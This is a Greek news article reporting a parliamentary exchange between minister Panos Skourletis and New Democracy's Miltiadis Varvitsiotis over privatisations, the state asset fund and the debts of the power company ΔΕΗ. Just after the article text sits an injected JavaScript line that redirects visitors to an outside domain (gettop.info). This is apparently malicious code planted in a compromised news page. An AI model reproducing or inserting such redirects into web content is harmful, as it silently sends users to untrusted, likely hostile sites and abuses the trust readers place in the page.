Κόντρα Σκουρλέτη-Βαρβιτσιώτη: Κληρονομήσαμε την κοινωνική καταστροφή

0
13

 

Σε αντιπαράθεση ήρθαν στη Βουλή ο υπουργός Πειρβάλλοντος Πάνος Σκουρλέτης και ο εισηγητής της ΝΔ Μιλτιάδης Βαρβιτσιώτης με αφορμή τις αποκρατικοποιήσεις.

«Είχατε δύο χρόνια την ίδια διοίκηση στο ΤΑΙΠΕΔ. Το μόνο που κάνατε ήταν η διαπραγμάτευση. Γιατί δεν εξαιρέσατε την ΕΥΔΑΠ, την ΕΥΑΘ και τα ΕΛΠΕ, παρά είναι στη λίστα των αποκρατικοποιήσεων και τα νερά και το 30% των ΕΛΠΕ;» ρώτησε ο κ. Βαρβτσιώτης τον υπουργό και συνέχισε: «Αυτά που συμφωνήσατε για τη ΔΕΗ στο μνημόνιο – να μειωθεί έως το 50% η παραγωγή της και οι πελάτης της, αντιστοίχως, χωρίς να πάρετε ούτε ένα ευρώ – δείχνει πόσο λάθος επιλογή ήταν. Γιατί αν είχατε συνεχίσει την επιλογή της μικρής ΔΕΗ θα είχαν εισρρεύσει κοντά στα 4 εκατ. της μικρής ΔΕΗ, δεν θα ήταν μία εταιρεία με τόσο σοβαρά οικονομικά προβλήματα, που απέκτησε στη δική σας διοίκηση (2 δισ. ανεξόφλητους λογαριασμούς) και σήμερα η ΔΕΗ να κινδυνεύει. Εμείς έχουμε σαφή θέση, εσείς προσπαθείτε να διαστρεβλώσετε την πραγματικότητα. Ξέρουμε τα εσωκομματικά σας προβλήματα. Απευθυνθείτε στους συναδέλφους σας υπουργούς να μην υπογράψουν τις αποκρατικοποιήσεις που λέτε. Ξέρουμε τις αντιδράσεις για το Ελληνικό, τώρα να δούμε με ποιο τρόπο θα αντιδράσετε στις επικείμενες αποκρατικοποιήσεις των νερών».

Ο κ. Σκουρλέτης αντέδρασε κατηγορώντας με τη σειρά του τη ΝΔ: «Είχατε την ευκαιρία να μας πείτε για την πώληση του 17% της ΔΕΗ αλλά κρυφτήκατε. Παρ’ ότι παραλάβαμε το αποτύπωμα των πολιτικών λιτότητας που οδήγησαν σε αυτά τα ληξιπρόθεσμα, με τις κινήσεις που κάναμε (36 δόσεις), πάνω από 1 εκατ. πολίτες βρίσκονται σε ρύθμιση και για πρώτη φορά μετά από πέντε χρόνια το απόλυτο νούμερο των χρεών προς τη ΔΕΗ μειώνεται. Ταυτόχρονα, πρώτη φορά έχουμε την έκπτωση συνέπειας του 15% και πληρώνουν μικρότερους λογαριασμούς οι μεροκαματιάρηδες και οι επιχειρήσεις», απάντησε και εκτίμησε πως: «Τα πράγματα θα πάνε καλά, διότι και στόχευση έχουμε και κυρίως κάνουμε τη δουλειά μας με καθαρούς όρους».

Ο κ. Σκουρλέτης συνέχισε μιώντας για «εκτελεστές συμβολαίων που έχει συνάψει η διαπλοκή».

«Δεν ανταλλάσσονται επιχειρήματα, αλλά διατυπώνονται εδώ μέσα απόλυτα ψεύδη σαν και αυτά που έχουν κατακλύσει τον δημόσιο διάλογο και παρακολουθούμε από τα ΜΜΕ, και έχουν ενταθεί τους τελευταίους μήνες για ευνόητους λόγους που σχετίζονται με τις αλλαγές στα ΜΜΕ», σχολίασε για τον τρόπο που εξελίσσεται στη Βουλή η συζήτηση του νομοσχεδίου, ο Πάνος Σκουρλέτης και προσέθεσε: «Από το πρωί παρακολουθούμε εκτελεστές συμβολαίων να κάνουν μια επίθεση στην κυβέρνηση χωρίς προηγούμενο και είναι επίθεση της διαπλοκής».

«Σε ένα πράγμα είστε σαφείς. Στην υπεράσπιση της διαπλοκής, το βλέπουμε. Και δεν έχετε αντιληφθεί, πως όταν η σημερινή κυβέρνηση λέει πως θα υπάρξουν νόμοι, θα ισχύουν για όλους. Όπως έγινε χθες! Νόμος στην ανομία», είπε ο υπουργός Περιβάλλοντος απευθυνόμενος στα έδρανα της ΝΔ .

Ο υπουργός σε σχέση με το περιεχόμενο του νομοσχεδίου, υπογράμμισε πως η μεταφορά στο Υπερταμείο δεν σημαίνει ότι το Δημόσιο χάνει την περιουσία του αλλά μένει να αξιοποιηθεί, ότι η μεταφορά δεν σημαίνει ιδιωτικοποίηση και ότι τα περιουσιακά αυτά στοιχεία δεν είναι σε εγγύηση των δανείων της χώρας. Είπε ακόμη ότι το Ταμείο αυτό προέκυψε μέσα από την περσινή διαπραγμάτευση και ήταν το ανάχωμα απέναντι στην πολιτική των ιδιωτικοποιήσεων, η οποία ήταν η πρόταση της κυβέρνησης Σαμαρά- Βενιζέλου.

«Κληρονομήσαμε την κοινωνική καταστροφή που είχατε φέρει στη χώρα και είμαστε αναγκασμένοι σήμερα να διαχειριζόμαστε αυτά για τα οποία εσείς ευθύνεστε», είπε ο Πάνος Σκουρλέτης, απευθυνόμενος στη ΝΔ και το ΠΑΣΟΚ.

«Εάν σε μια κυβέρνηση Μητσοτάκη είναι ο Γεωργιάδης υπουργός, όχι απλώς θα ιδιωτικοποιηθούν τα πάντα, αλλά θα μπουν και άλλα μέσα», σχολίασε επίσης ο κ. Σκουρλέτης όσα ανέφερε χθες ο Α. Γεωργιάδης για την υπαγωγή της ΕΥΑΘ και ΕΥΔΑΠ στην ΕΔΗΣ (Εταιρεία Δημοσίων Συμμετοχών).

  setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here